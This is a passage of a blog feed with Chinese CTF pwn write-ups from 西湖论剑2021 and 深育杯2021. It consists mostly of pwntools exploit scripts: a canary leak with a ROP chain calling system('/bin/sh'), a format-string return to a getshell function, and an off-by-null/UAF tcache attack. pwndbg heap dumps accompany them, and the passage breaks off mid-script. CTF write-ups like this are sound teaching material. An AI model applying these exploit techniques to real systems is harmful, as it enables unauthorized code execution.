class="number">12345</span>)</span><br><span class="line">    <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(filename)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;&gt;&gt;&gt; &#x27;</span>,<span class="string">&#x27;1+2&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;&gt;&gt;&gt; &#x27;</span>,<span class="string">&#x27;-1&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;&gt;&gt;&gt; &#x27;</span>,<span class="string">&#x27;a&#x27;</span>*<span class="number">8</span>)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;&gt;&gt;&gt; &#x27;</span>,<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.recv(<span class="number">0x38</span>)</span><br><span class="line">canary = u64(p.recv(<span class="number">8</span>))</span><br><span class="line">p.recv(<span class="number">0xb8</span>)</span><br><span class="line">libc_base = u64(p.recv(<span class="number">8</span>)) - <span class="number">0x21b97</span> </span><br><span class="line">log.success(<span class="string">&#x27;canary: &#x27;</span> + <span class="built_in">hex</span>(canary))</span><br><span class="line">log.success(<span class="string">&#x27;libc_base: &#x27;</span> + <span class="built_in">hex</span>(libc_base))</span><br><span class="line"></span><br><span class="line">pop_rdi = libc_base + <span class="built_in">next</span>(libc.search(asm(<span class="string">&#x27;pop rdi\nret&#x27;</span>)))</span><br><span class="line">ret = libc_base + <span class="built_in">next</span>(libc.search(asm(<span class="string">&#x27;ret&#x27;</span>)))</span><br><span class="line">system_addr = libc_base + libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">bin_sh = libc_base + libc.search(<span class="string">&#x27;/bin/sh&#x27;</span>).<span class="built_in">next</span>()</span><br><span class="line">log.success(<span class="string">&#x27;system_addr: &#x27;</span> + <span class="built_in">hex</span>(system_addr))</span><br><span class="line">log.success(<span class="string">&#x27;pop_rdi: &#x27;</span> + <span class="built_in">hex</span>(pop_rdi))</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x18</span> + p64(canary) + <span class="string">&#x27;b&#x27;</span>*<span class="number">0x18</span> + p64(ret) + p64(pop_rdi) + p64(bin_sh) + p64(system_addr)</span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>]]></content>
    
    
    <summary type="html">西湖论剑2021</summary>
    
    
    
    <category term="WriteUp" scheme="https://trick.ink/categories/WriteUp/"/>
    
    
    <category term="函数中的syscall调用" scheme="https://trick.ink/tags/%E5%87%BD%E6%95%B0%E4%B8%AD%E7%9A%84syscall%E8%B0%83%E7%94%A8/"/>
    
    <category term="代码审计" scheme="https://trick.ink/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
    
  </entry>
  
  <entry>
    <title>深育杯2021</title>
    <link href="https://trick.ink/article/SYB2021/"/>
    <id>https://trick.ink/article/SYB2021/</id>
    <published>2021-11-20T06:40:16.000Z</published>
    <updated>2023-02-09T18:03:12.064Z</updated>
    
    <content type="html"><![CDATA[<h1 id="深育杯2021"><a href="#深育杯2021" class="headerlink" title="深育杯2021"></a>深育杯2021</h1><!-- 文章页 配置 --><h1 id="Pwn"><a href="#Pwn" class="headerlink" title="Pwn"></a>Pwn</h1><h2 id="find-flag"><a href="#find-flag" class="headerlink" title="find_flag"></a>find_flag</h2><p>格式化字符串漏洞</p><h3 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h3><ul><li>利用格式化字符串漏洞泄漏栈基地址以及canary</li><li>覆盖函数返回地址到getshell函数</li></ul><p><img src="/article/SYB2021/image-20211120163251331.png" alt="image-20211120163251331"></p><p><img src="/article/SYB2021/image-20211120163241059.png" alt="image-20211120163241059"></p><h3 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">&#x27;linux&#x27;</span></span><br><span class="line"><span class="comment"># context.arch = &#x27;amd64&#x27;</span></span><br><span class="line"><span class="comment"># context.arch = &#x27;i386&#x27;</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">&#x27;find_flag&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line">    p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;81.69.185.153&#x27;</span>,<span class="number">8010</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;127.0.0.1&#x27;</span>,<span class="number">12345</span>)</span><br><span class="line">    <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(filename)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line">gdb.attach(p,<span class="string">&#x27;b *$rebase(0x13CC)&#x27;</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;%16$p %17$p&#x27;</span></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;your name? &#x27;</span>,payload)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;Nice to meet you, &#x27;</span>)</span><br><span class="line">stack_addr = <span class="built_in">int</span>(p.recv(<span class="number">14</span>),<span class="number">16</span>) -<span class="number">0x1140</span></span><br><span class="line">p.recvuntil(<span class="string">&#x27;0x&#x27;</span>)</span><br><span class="line">canary = <span class="built_in">int</span>(p.recv(<span class="number">16</span>),<span class="number">16</span>)</span><br><span class="line">getshell_addr = stack_addr + <span class="number">0x1229</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x38</span> + p64(canary) + p64(getshell_addr)*<span class="number">2</span></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;Anything else? &#x27;</span>,payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><h2 id="writebook"><a href="#writebook" class="headerlink" title="writebook"></a>writebook</h2><h3 id="libc-2-27"><a href="#libc-2-27" class="headerlink" title="libc-2.27"></a>libc-2.27</h3><h3 id="off-by-null"><a href="#off-by-null" class="headerlink" title="off-by-null"></a>off-by-null</h3><p><img src="/article/SYB2021/image-20211120144322548.png" alt="image-20211120144322548"></p><p><img src="/article/SYB2021/image-20211120144331265.png" alt="image-20211120144331265"></p><p>在edit函数中存在off-by-null漏洞，可以实现堆块向上（也就是低地址）合并。</p><h3 id="利用思路-1"><a href="#利用思路-1" class="headerlink" title="利用思路"></a>利用思路</h3><ul><li>首先填满0x100和0x120大小堆块的tcache。填充0x120的堆块是因为0x100堆块泄漏libc时被\x00截断了。</li><li>利用off-by-null合并低地址堆块。</li><li>申请一个小于合并后大小的堆块，同时还要能覆盖到下一个堆块，泄漏残留的libc地址。</li></ul><h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><h4 id="off-by-null-合并低地址堆块"><a href="#off-by-null-合并低地址堆块" class="headerlink" title="off-by-null 合并低地址堆块"></a>off-by-null 合并低地址堆块</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line">Free chunk (unsortedbin) | PREV_INUSE</span><br><span class="line">Addr: 0x55ea81e1a130</span><br><span class="line">Size: 0x121</span><br><span class="line">fd: 0x7f39a48ffca0</span><br><span class="line">bk: 0x7f39a48ffca0</span><br><span class="line"></span><br><span class="line">Allocated chunk</span><br><span class="line">Addr: 0x55ea81e1a250</span><br><span class="line">Size: 0x70</span><br><span class="line"></span><br><span class="line">Allocated chunk | PREV_INUSE</span><br><span class="line">Addr: 0x55ea81e1a2c0</span><br><span class="line">Size: 0x101</span><br><span class="line"></span><br><span class="line">Allocated chunk | PREV_INUSE</span><br><span class="line">Addr: 0x55ea81e1a3c0</span><br><span class="line">Size: 0x101</span><br><span class="line"></span><br><span class="line">Top chunk | PREV_INUSE</span><br><span class="line">Addr: 0x55ea81e1a4c0</span><br><span class="line">Size: 0x1fb41</span><br><span class="line"></span><br><span class="line">pwndbg&gt; x&#x2F;80gx 0x55ea81e1a130</span><br><span class="line">0x55ea81e1a130:0x00000000000000000x0000000000000121#泄漏堆块 unsortedbin</span><br><span class="line">0x55ea81e1a140:0x00007f39a48ffca00x00007f39a48ffca0</span><br><span class="line">0x55ea81e1a150:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a160:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a170:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a180:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a190:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a1a0:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a1b0:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a1c0:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a1d0:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a1e0:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a1f0:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a200:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a210:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a220:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a230:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a240:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a250:0x00000000000001200x0000000000000070# edit</span><br><span class="line">0x55ea81e1a260:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a270:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a280:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a290:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a2a0:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a2b0:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a2c0:0x00000000000000000x0000000000000101# prev_size &#x3D; 0x55ea81e1a2c0 - 0x55ea81e1a130，同时 prev_inuse &#x3D; 0</span><br><span class="line">0x55ea81e1a2d0:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a2e0:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a2f0:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a300:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a310:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a320:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a330:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a340:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a350:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a360:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a370:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a380:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a390:0x00000000000000000x0000000000000000</span><br><span class="line">0x55ea81e1a3a0:0x00000000000000000x0000000000000000</span><br><span class="line">pwndbg&gt; </span><br></pre></td></tr></table></figure><h4 id="free-prev-inuse-0-的堆块后"><a href="#free-prev-inuse-0-的堆块后" class="headerlink" title="free prev_inuse = 0 的堆块后"></a>free prev_inuse = 0 的堆块后</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x&#x2F;100gx 0x56380e686130</span><br><span class="line">0x56380e686130:0x00000000000000000x0000000000000291</span><br><span class="line">0x56380e686140:0x00007fa043d2eca00x00007fa043d2eca0</span><br><span class="line">0x56380e686150:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e686160:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e686170:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e686180:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e686190:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e6861a0:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e6861b0:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e6861c0:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e6861d0:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e6861e0:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e6861f0:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e686200:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e686210:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e686220:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e686230:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e686240:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e686250:0x00000000000001200x0000000000000070</span><br><span class="line">0x56380e686260:0x61616161616161610x6161616161616161# UAF</span><br><span class="line">0x56380e686270:0x61616161616161610x6161616161616161</span><br><span class="line">0x56380e686280:0x61616161616161610x6161616161616161</span><br><span class="line">0x56380e686290:0x61616161616161610x6161616161616161</span><br><span class="line">0x56380e6862a0:0x61616161616161610x6161616161616161</span><br><span class="line">0x56380e6862b0:0x61616161616161610x6161616161616161</span><br><span class="line">0x56380e6862c0:0x00000000000001900x0000000000000100</span><br><span class="line">0x56380e6862d0:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e6862e0:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e6862f0:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e686300:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e686310:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e686320:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e686330:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e686340:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e686350:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e686360:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e686370:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e686380:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e686390:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e6863a0:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e6863b0:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e6863c0:0x00000000000002900x0000000000000100</span><br><span class="line">0x56380e6863d0:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e6863e0:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e6863f0:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e686400:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e686410:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e686420:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e686430:0x00000000000000000x0000000000000000</span><br><span class="line">0x56380e686440:0x00000000000000000x0000000000000000</span><br><span class="line">pwndbg&gt; p&#x2F;x 0x56380e686130+0x290</span><br><span class="line">$1 &#x3D; 0x56380e6863c0</span><br></pre></td></tr></table></figure><h4 id="UAF"><a href="#UAF" class="headerlink" title="UAF"></a>UAF</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x&#x2F;80gx 0x563655823130</span><br><span class="line">0x563655823130:0x00000000000000000x0000000000000141</span><br><span class="line">0x563655823140:0x0068732f6e69622f0x6161616161616161</span><br><span class="line">0x563655823150:0x61616161616161610x6161616161616161</span><br><span class="line">0x563655823160:0x61616161616161610x6161616161616161</span><br><span class="line">0x563655823170:0x61616161616161610x6161616161616161</span><br><span class="line">0x563655823180:0x61616161616161610x6161616161616161</span><br><span class="line">0x563655823190:0x61616161616161610x6161616161616161</span><br><span class="line">0x5636558231a0:0x61616161616161610x6161616161616161</span><br><span class="line">0x5636558231b0:0x61616161616161610x6161616161616161</span><br><span class="line">0x5636558231c0:0x61616161616161610x6161616161616161</span><br><span class="line">0x5636558231d0:0x61616161616161610x6161616161616161</span><br><span class="line">0x5636558231e0:0x61616161616161610x6161616161616161</span><br><span class="line">0x5636558231f0:0x61616161616161610x6161616161616161</span><br><span class="line">0x563655823200:0x61616161616161610x6161616161616161</span><br><span class="line">0x563655823210:0x61616161616161610x6161616161616161</span><br><span class="line">0x563655823220:0x61616161616161610x6161616161616161</span><br><span class="line">0x563655823230:0x61616161616161610x6161616161616161</span><br><span class="line">0x563655823240:0x61616161616161610x6161616161616161</span><br><span class="line">0x563655823250:0x61616161616161610x6161616161616161</span><br><span class="line">0x563655823260:0x00007f7cac3808e80x6161616161616100</span><br><span class="line">0x563655823270:0x61616161616161610x0000000000000151</span><br><span class="line">0x563655823280:0x00007f7cac37eca00x00007f7cac37eca0</span><br><span class="line">0x563655823290:0x61616161616161610x6161616161616161</span><br><span class="line">0x5636558232a0:0x61616161616161610x6161616161616161</span><br><span class="line">0x5636558232b0:0x61616161616161610x6161616161616161</span><br><span class="line">0x5636558232c0:0x00000000000001900x0000000000000100</span><br><span class="line">0x5636558232d0:0x00000000000000000x0000000000000000</span><br><span class="line">0x5636558232e0:0x00000000000000000x0000000000000000</span><br><span class="line">0x5636558232f0:0x00000000000000000x0000000000000000</span><br><span class="line">0x563655823300:0x00000000000000000x0000000000000000</span><br><span class="line">0x563655823310:0x00000000000000000x0000000000000000</span><br><span class="line">0x563655823320:0x00000000000000000x0000000000000000</span><br><span class="line">0x563655823330:0x00000000000000000x0000000000000000</span><br><span class="line">0x563655823340:0x00000000000000000x0000000000000000</span><br><span class="line">0x563655823350:0x00000000000000000x0000000000000000</span><br><span class="line">0x563655823360:0x00000000000000000x0000000000000000</span><br><span class="line">0x563655823370:0x00000000000000000x0000000000000000</span><br><span class="line">0x563655823380:0x00000000000000000x0000000000000000</span><br><span class="line">0x563655823390:0x00000000000000000x0000000000000000</span><br><span class="line">0x5636558233a0:0x00000000000000000x0000000000000000</span><br><span class="line">pwndbg&gt; bin</span><br><span class="line">tcachebins</span><br><span class="line">0x70 [  1]: 0x563655823260 —▸ 0x7f7cac3808e8 (__free_hook) ◂— ...</span><br></pre></td></tr></table></figure><h3 id="exp-1"><a href="#exp-1" class="headerlink" title="exp"></a>exp</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">&#x27;linux&#x27;</span></span><br><span class="line"><span class="comment"># context.arch = &#x27;amd64&#x27;</span></span><br><span class="line"><span class="comment"># context.arch = &#x27;i386&#x27;</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">&#x27;writebook&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line">    p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;81.69.185.153&#x27;</span>,<span class="number">8010</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;127.0.0.1&#x27;</span>,<span class="number">12345</span>)</span><br><span class="line">    <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(filename)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cmd</span>(<span class="params">index</span>):</span></span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;&gt; &#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size</span>):</span></span><br><span class="line">    cmd(<span class="number">1</span>)</span><br><span class="line">    <span class="keyword">if</span> size &lt;= <span class="number">0xf0</span>:</span><br><span class="line">        p.sendlineafter(<span class="string">&#x27;&gt; &#x27;</span>,<span class="built_in">str</span>(<span class="number">1</span>))</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        p.sendlineafter(<span class="string">&#x27;&gt; &#x27;</span>,<span class="built_in">str</span>(<span class="number">2</span>))</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;size: &#x27;</span>,<span class="built_in">str</span>(size))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,content</span>):</span></span><br><span class="line">    cmd(<span class="number">2</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Page: &#x27;</span>,<span class="built_in">str</span>(index))   </span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Content: &#x27;</span>,content)  </span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">index</span>):</span></span><br><span class="line">    cmd(<span class="number">3</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Page: &#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span class="line">    cmd(<span class="number">4</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Page: &#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">    add(<span class="number">0xf0</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">8</span>):</span><br><span class="line">    add(<span class="number">0x110</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x68</span>)<span class="comment">#8</span></span><br><span class="line">add(<span class="number">0xf0</span>)<span class="comment">#9</span></span><br><span class="line">add(<span class="number">0xf0</span>)<span class="comment">#10</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">15</span>):</span><br><span class="line">    free(i)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span 